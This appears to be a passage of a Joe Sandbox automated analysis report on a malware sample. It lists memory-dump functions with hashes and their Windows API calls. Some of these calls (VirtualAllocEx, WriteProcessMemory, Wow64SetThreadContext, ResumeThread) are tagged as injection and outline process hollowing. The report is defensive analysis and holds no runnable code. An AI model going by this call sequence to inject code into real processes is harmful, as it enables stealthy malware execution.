                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: dc0cd14a1e120f837a8a5069e4ab4ac8c2b28299f4990b932af5ac043896a5b4
                          • Instruction ID: 9e2c4e47acd963b8c6c769cd712a168452ee74684ba1a8a2026edffaca789928
                          • Opcode Fuzzy Hash: dc0cd14a1e120f837a8a5069e4ab4ac8c2b28299f4990b932af5ac043896a5b4
                          • Instruction Fuzzy Hash: 77A15E72E0071A8FDB24CFA8CC417EDBBB2BF48315F148569E818A7240DB759985CF91
                          Function 08EED370 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08EED5A6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 33ac970c7bd2c35a7c0e5444292aa25c885dcf9c91d2ac9a53c6acf40832ab95
                          • Instruction ID: 58ab77699b5cfe5a7f12579c612bac552ac5cf0639d688e053db8c7b95a4cbae
                          • Opcode Fuzzy Hash: 33ac970c7bd2c35a7c0e5444292aa25c885dcf9c91d2ac9a53c6acf40832ab95
                          • Instruction Fuzzy Hash: 40914D72E0071A8FDB24CF68CC41BEDBBB2BB48315F148669E819A7240DB759985CF91
                          Function 0313B417 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0313B67E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 0e8c1c2f0eb928bd374342bac3dc3c8df92ed2b6c01333cf386d816201f3945f
                          • Instruction ID: ce8ab26eda6f15532cdcbd9d8303d7ba861f08f44ef613560ba26953ca6f4b40
                          • Opcode Fuzzy Hash: 0e8c1c2f0eb928bd374342bac3dc3c8df92ed2b6c01333cf386d816201f3945f
                          • Instruction Fuzzy Hash: 38817770A04B058FDB24DF2AD45579ABBF1FF89300F04892DD48ADBA50EB34E846CB95
                          Function 031344B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 031359C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: ccc7d255ed9cc1e6d980701514b040a9d21f9bfa53a108a9dcf600eb583bda0b
                          • Instruction ID: fa404da20e69efa869c2f89c47b4ff271d926c206c90c2023739ac69215be7ce
                          • Opcode Fuzzy Hash: ccc7d255ed9cc1e6d980701514b040a9d21f9bfa53a108a9dcf600eb583bda0b
                          • Instruction Fuzzy Hash: F641E2B1C0072DCBDB24DFA9C884B9DBBF6BF49714F20816AD408AB251DB756946CF90
                          Function 0313590D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 031359C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: cd95205b4537ac96ee24243590eb23e1dc8388de5e6954afcf339e08af25586c
                          • Instruction ID: 85b8cb964c1bd0f4917e52069b581b21387c49445c8d95af6a20ec3b59473984
                          • Opcode Fuzzy Hash: cd95205b4537ac96ee24243590eb23e1dc8388de5e6954afcf339e08af25586c
                          • Instruction Fuzzy Hash: C241D1B1C00729CBDB24DFA9C8847CDBBB2BF49714F20856AD408AB251DB756946CF50
                          Function 08D459F8 Relevance: 1.6, Strings: 1, Instructions: 345COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hq
                          • API String ID: 0-1594803414
                          • Opcode ID: 88c60ad36c161c35913430c158f877b27342ad06703c1d297839b1b378dbf504
                          • Instruction ID: 93be35d340707bb05db8652f931274b14a4bf143db8fbad2ed6a62453b09441c
                          • Opcode Fuzzy Hash: 88c60ad36c161c35913430c158f877b27342ad06703c1d297839b1b378dbf504
                          • Instruction Fuzzy Hash: 9FD1BD70B00205CFDB14DF69D485AAEBBF2AF88341F14856AE449EB355DB34DD46CBA0
                          Function 076D8EF8 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: &
                          • API String ID: 0-1010288
                          • Opcode ID: 850cb37a98560eb329cac0ac0c05ee8aab364d831b8adecbc5fea4e1ca861390
                          • Instruction ID: 23e35fa65863eef552986329acc7879cafd47934ad32dedfa6e01514e4fbd732
                          • Opcode Fuzzy Hash: 850cb37a98560eb329cac0ac0c05ee8aab364d831b8adecbc5fea4e1ca861390
                          • Instruction Fuzzy Hash: B3C1C0B5B343029FCB189F71A55453ABBA2BFC52407598A99D84B8B385DF34FC02C791
                          Function 08EED0E0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08EED178
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 493b57542b29d25137da60f7c54dc124c78bb61996979d5f6193fe8b7d6446f9
                          • Instruction ID: f7e7ca8776627078af8ad5464ef9913cbecb9706769b3eef5803c89dea617263
                          • Opcode Fuzzy Hash: 493b57542b29d25137da60f7c54dc124c78bb61996979d5f6193fe8b7d6446f9
                          • Instruction Fuzzy Hash: 9B2124759003499FDB10DFA9C881BEEBBF1FF48320F108529E959A7250C7789945CB60
                          Function 08EECB10 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08EECB96
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: a22334a2c96c5d6730f804762d1169d34cdafdfbb1eed36f1c3c56f8e493cea4
                          • Instruction ID: 9455acaa554202d450b58693a00870d445a92dd95999ce5e2aa00928bd764500
                          • Opcode Fuzzy Hash: a22334a2c96c5d6730f804762d1169d34cdafdfbb1eed36f1c3c56f8e493cea4
                          • Instruction Fuzzy Hash: 2D216971D043498FDB20CFA9C4857EEBFF0AF49210F14842ED459A7281CB789A45CF61
                          Function 08EED0E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08EED178
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 5762a49dd215d8fc98445ad2b3bd32187263d482c64df96e4d619c1d220a7cc9
                          • Instruction ID: f1e17c3552012865ea4fd930a4218c363a45b6eb0cd82a7dfeb929f0b1fd0bb1
                          • Opcode Fuzzy Hash: 5762a49dd215d8fc98445ad2b3bd32187263d482c64df96e4d619c1d220a7cc9
                          • Instruction Fuzzy Hash: 54213975D003099FDB10DFA9C881BDEBBF5FF48310F508429E919A7250C7799951CBA4
                          Function 0592A1D8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0592A277
                          Memory Dump Source
                          • Source File: 00000000.00000002.1322384622.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5920000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          • Opcode ID: 3a4fda58cf5858215d42cf14340f7f3358d23c045c8dc3729d255028c2f585cf
                          • Instruction ID: 953106d3c78d134d3aad859264127cb30cee302756488d8299aff5b7b5d768c1
                          • Opcode Fuzzy Hash: 3a4fda58cf5858215d42cf14340f7f3358d23c045c8dc3729d255028c2f585cf
                          • Instruction Fuzzy Hash: AE31E0B6D003499FDB10CF9AD880A9EBBF4FF48220F14842AE919A7210D775A945CFA0
                          Function 0592A1E0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0592A277
                          Memory Dump Source
                          • Source File: 00000000.00000002.1322384622.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5920000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          • Opcode ID: 7fe660577c2e3ced35129a787eb5fa24d05fef772745b6d98aea1d265d1414e0
                          • Instruction ID: 369a82fb4f7745fc70a27ffc663f74fed2f4b69cf94a26c855f148edda3c5a1f
                          • Opcode Fuzzy Hash: 7fe660577c2e3ced35129a787eb5fa24d05fef772745b6d98aea1d265d1414e0
                          • Instruction Fuzzy Hash: E321C0B5D003099FDB10CF9AD884A9EFBF9FB48320F14842AE919A7210D775A945CFA0
                          Function 0313D900 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0313D8CE,?,?,?,?,?), ref: 0313D98F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 8da9ccc400e42f7c8d2b07c9ff91874723c90954175c69c77b53344db7bceead
                          • Instruction ID: a5a5e0a0efb1b916e1c0146d3448be30afea1982f7d0cabf73f3845a5d8edf85
                          • Opcode Fuzzy Hash: 8da9ccc400e42f7c8d2b07c9ff91874723c90954175c69c77b53344db7bceead
                          • Instruction Fuzzy Hash: D02105B5D002099FDB10CFAAE984ADEFBF9FB49320F14801AE914A3310D374A940CFA5
                          Function 08EED1D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08EED258
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: ebb3f0aca15b9449752ae58badeabbad8ec0c0c057ee19faa27beeb94652090c
                          • Instruction ID: cdc8040dcd392fc03254d53a45b10e8dc8c9591312a1f28c388710bfebf69033
                          • Opcode Fuzzy Hash: ebb3f0aca15b9449752ae58badeabbad8ec0c0c057ee19faa27beeb94652090c
                          • Instruction Fuzzy Hash: FC211671D003499FDB10DFAAC881BEEBBF1FF48310F54852AE959A7250CB399941CBA0
                          Function 0313B314 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0313D8CE,?,?,?,?,?), ref: 0313D98F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 36a8ed5ceb332065135a6f4763da66db61fb1e0a8dc5f2f53fed07fd007f8416
                          • Instruction ID: 5c1e227b2db2fb76cf3b3d63f508d4408fc221b3de367a052346dd4b36f72ebf
                          • Opcode Fuzzy Hash: 36a8ed5ceb332065135a6f4763da66db61fb1e0a8dc5f2f53fed07fd007f8416
                          • Instruction Fuzzy Hash: 3C21F2B59002089FDB10CF9AD884AEEBBF4FB48310F14841AE914A3210D774A940CFA1
                          Function 08EECB18 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08EECB96
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 2af9faf9a8b16fdcf96696427f679baf189ad8f670e8d2bfd3d80694471c08be
                          • Instruction ID: 5fe272cc7b493b41799743d18c5caa2d056c2d9de2fe2a660b57342ed2599361
                          • Opcode Fuzzy Hash: 2af9faf9a8b16fdcf96696427f679baf189ad8f670e8d2bfd3d80694471c08be
                          • Instruction Fuzzy Hash: 6D213871D003098FDB20DFAAC485BAEBBF4EF48314F54842DD459A7240CB789945CFA4
                          Function 08EED1D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08EED258
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 27fea1a6f443a50aa1560158e68f7449266517560400141858b22868596270a9
                          • Instruction ID: 7c8f92cc2080ec72c83de6daae0a6c01cee40a50c8c8f7771ae278bf12ad677e
                          • Opcode Fuzzy Hash: 27fea1a6f443a50aa1560158e68f7449266517560400141858b22868596270a9
                          • Instruction Fuzzy Hash: 2B21F571D003499FDB10DFAAC881BEEBBF5FF48310F50842AE919A7250DB799941CBA5
                          Function 08EED020 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08EED096
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 64aa55ce5b77ee97a513a125c4268e97e3bb3c065256c4d5b24fa394619fcb61
                          • Instruction ID: 2e3cb09dda33ba1208e5a5adc68522006465106a98c0ed7856963c634ae3e8b5
                          • Opcode Fuzzy Hash: 64aa55ce5b77ee97a513a125c4268e97e3bb3c065256c4d5b24fa394619fcb61
                          • Instruction Fuzzy Hash: A2114472D003499FDB20DFAAC845BEEBBF5EB49320F14841AE515A7250CB769941CBA0
                          Function 08EECA60 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: d8f55a3de81026bbbfab7c79437ce95b39b1c255a6238bae99e6264c6a54b695
                          • Instruction ID: fd3435b471243b69636d3538170bbf4423693f791d0f8e89c1fad85be17de5c0
                          • Opcode Fuzzy Hash: d8f55a3de81026bbbfab7c79437ce95b39b1c255a6238bae99e6264c6a54b695
                          • Instruction Fuzzy Hash: E4114971D003498FDB20DFAAC445BAEBFF4AB48224F24841DD41AA7250CB759541CFA4
                          Function 08EED028 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08EED096
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: a8f6c1fead2a0b38c5abcfafeed042cfe046655d2770f800948cf0beb9c8a743
                          • Instruction ID: fdfc67b0ed13722d1a6a610574f835845a0a0b4157fd2db9d0efd317d58dd134
                          • Opcode Fuzzy Hash: a8f6c1fead2a0b38c5abcfafeed042cfe046655d2770f800948cf0beb9c8a743
                          • Instruction Fuzzy Hash: 62113776D003499FDB20DFAAC845BDEBBF5EF48320F148419E515A7250CB769941CFA4
                          Function 08F915C8 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 08F9162D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1328326436.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8f90000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 7563c21e8094b742aef0d597b53d744aedbba958a2b862e1129609816356ebd5
                          • Instruction ID: 9c28655ade2b0bda351083ea0b96aa3a02cb940cf8bc61f3aa44cc824589d733
                          • Opcode Fuzzy Hash: 7563c21e8094b742aef0d597b53d744aedbba958a2b862e1129609816356ebd5
                          • Instruction Fuzzy Hash: 981185B5C043898FDB21CFAAD885BDEBFF4EB49320F14845AD454A7251C378A984CFA1
                          Function 08EECA68 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: a37c6de3beaa621ef471d580c797a926eb2e9da7a284283e320422d8c6d8f864
                          • Instruction ID: 07ae3f9fd579c232d487184b1ec11fe4f982923e55588a57615ba6a48cef3ca3
                          • Opcode Fuzzy Hash: a37c6de3beaa621ef471d580c797a926eb2e9da7a284283e320422d8c6d8f864
                          • Instruction Fuzzy Hash: 1D110671D003498FDB24DFAAC445BAEFBF5EB88324F248419D51AA7240CB79A945CFA4
                          Function 0313B618 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0313B67E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 6fe4e3bd9f0cc643c75f76282e2372b4d79f440fbdaa36cfc08f2be043b76341
                          • Instruction ID: 6b659cb20f820e3bb102fa4da63f7f6f7fa43789c2aeb3bba9e33b9aaea3325b
                          • Opcode Fuzzy Hash: 6fe4e3bd9f0cc643c75f76282e2372b4d79f440fbdaa36cfc08f2be043b76341
                          • Instruction Fuzzy Hash: 581110B5C007498FCB20CF9AC444BDEFBF4EB88320F14842AD429A7210D379A545CFA1
                          Function 08F915D0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 08F9162D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1328326436.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8f90000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 65865fadd27b9989d604865f5592b01a524f7dea68060ad2e8210a58919b271c
                          • Instruction ID: 963e4ebd4e382a332071380e17b20dec0aa393a084b94f7d965546fd7177594d
                          • Opcode Fuzzy Hash: 65865fadd27b9989d604865f5592b01a524f7dea68060ad2e8210a58919b271c
                          • Instruction Fuzzy Hash: C01103B5C003499FDB20DF9AD885BDEBBF8EB48320F108419D558A3240D379A984CFA1
                          Function 076F7758 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hq
                          • API String ID: 0-1594803414
                          • Opcode ID: 0b83ff4170a048e448e12d8a82fda956be27d4fdd91897fba809c354386d5e17
                          • Instruction ID: 810d78d420a03905e91877c2f39efddfd2cc17df833c0dc9042d5d9edfd80ff1
                          • Opcode Fuzzy Hash: 0b83ff4170a048e448e12d8a82fda956be27d4fdd91897fba809c354386d5e17
                          • Instruction Fuzzy Hash: D5A1AE70A003059FDB15DF68C484A9ABBF2FF89300B6485ADD55A8F362CB31ED46CB90
                          Function 076D4E9D Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,q
                          • API String ID: 0-196045463
                          • Opcode ID: 1e1da6282f898097bc26df6c54d5ebef01959e5b36a58649a0db6de077a9d38e
                          • Instruction ID: 3da5f1a05810530a33117641af6751e14c66203e2e1f666bc9ea828ee0d7c0ea
                          • Opcode Fuzzy Hash: 1e1da6282f898097bc26df6c54d5ebef01959e5b36a58649a0db6de077a9d38e
                          • Instruction Fuzzy Hash: 1E71BAB0F31206CFEB259A36C85567977E66FCA141F294066D947CB7A2EE30CC138792
                          Function 08D40CC8 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: a8833ec09fa03abe6f6b0244de6a33a9357d5eea16df4cdb98ece5b7a9bdfd71
                          • Instruction ID: 7d2a2ba398ff72d2d47b0fedba519d06d8a64872a45ee2e7b1604b914452e99e
                          • Opcode Fuzzy Hash: a8833ec09fa03abe6f6b0244de6a33a9357d5eea16df4cdb98ece5b7a9bdfd71
                          • Instruction Fuzzy Hash: 34519171A00219DFDB55CFA8C884AAEBBF5FF48341F148169EA05EB251D730ED56CB90
                          Function 076F7F08 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q
                          • API String ID: 0-1807707664
                          • Opcode ID: 6fbcbca7131cb0fdb5bfd2dfa26161dc4e94abbc8e4f6f9c3ec7561ea8439c25
                          • Instruction ID: a52d053314b04ed56a1ea997f808b56d5e6608acbae39173c564b1857b1d4259
                          • Opcode Fuzzy Hash: 6fbcbca7131cb0fdb5bfd2dfa26161dc4e94abbc8e4f6f9c3ec7561ea8439c25
                          • Instruction Fuzzy Hash: 9C519EB5A00306DFD705DF68C48499ABBF2FF89310B5586A9D4499B326DB30ED46CB90
                          Function 076D9E40 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: 7
                          • API String ID: 0-1790921346
                          • Opcode ID: 0b759fc75a2ebfb66d39a2f8a4f54d751688330405522b07559266ff5df10e3d
                          • Instruction ID: e983f731c205f711897057169ced86a5cc996edd2817115a7f57beff14da8379
                          • Opcode Fuzzy Hash: 0b759fc75a2ebfb66d39a2f8a4f54d751688330405522b07559266ff5df10e3d
                          • Instruction Fuzzy Hash: B6415BB4B10301CFD724DF35C444A6AB7B6EF89310B19C5AAE44A8B366DB31EC46CB51
                          Function 076F7F18 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q
                          • API String ID: 0-1807707664
                          • Opcode ID: e18277e015c2a8ccc3c28b323f37058aa60a44fc27c75d78de013bacc9bea0d4
                          • Instruction ID: e1837cb5efa372f7a01912060f9f524146f314ca317c3b4679509e483f133d05
                          • Opcode Fuzzy Hash: e18277e015c2a8ccc3c28b323f37058aa60a44fc27c75d78de013bacc9bea0d4
                          • Instruction Fuzzy Hash: C3516EB4A00316DFD715DF68C48499EBBF2FF89310B1586A9D4499B326DB30ED46CB90
                          Function 076F8A50 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
